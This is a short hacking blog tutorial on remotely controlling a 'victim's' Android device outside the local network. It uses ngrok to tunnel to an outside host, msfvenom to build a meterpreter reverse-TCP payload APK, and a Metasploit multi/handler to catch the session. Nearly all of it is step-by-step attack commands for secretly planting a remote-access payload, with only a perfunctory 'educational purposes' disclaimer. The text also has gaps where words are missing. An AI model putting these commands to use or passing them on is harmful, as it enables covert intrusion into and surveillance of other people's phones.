Remotely Control Out Of LAN (Local Area Network) Devices With Metasploit And Ngrok

Hey guys, we are back with a simple tutorial to hack  by using Tool

after getting a lot of requests from our users, we decided to post this article about how to hack with 

We have already posted an article about how to use  and Installation of some Hacking Tools, if you have missed that article then

You Can Read It here: 



Warning
This Tutorials is Only For Educational Purposes Only and we are no more responsible for any mistake you do


we are come back with another excited practical of exploitation with metasploit-framework in which we show you how to remotely access victim's devices out of local area network or victim on different network or wifi with payload. So excited let's get started.



Requirements:-
Metasploit-Framework
Ngrok
Setup Ngrok For Port Forwarding:-


Download and setup ngrok in your terminal
$ ./ngrok authtoken ****Paste Your Auth Token****

$ ./ngrok tcp 4444 (You can use different port in place of 4444 and tcp)

Once it show you online status interface then it's done. Now open new session and proceed.

Generating Payload:-
$ msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=15048(Use Your given Port in my case 15048) R > Payload.apk

Now wait unitl it generate payload for you. Once it done now you can install payload in victim device and exploit with given commands.

Exploitation:-


$ msfconsole

$ use mulit/handler

$ set payload android/meterpreter/reverse_tcp

$ set lhost 0.0.0.0

$ set lport 4444 (Type your port in my case am used 4444)

$ exploit


Basudev

Posted by: shivam

Hello, am shivam From lucknow, India.
I am a Die Hard Learner, a Blogger & a Hacker
My Core Interests are Learning, Blogging, Ethical Hacking, ProgrammingYou may like Popular Posts


Now it works out of LAN successfully.

Comments

Popular posts from this blog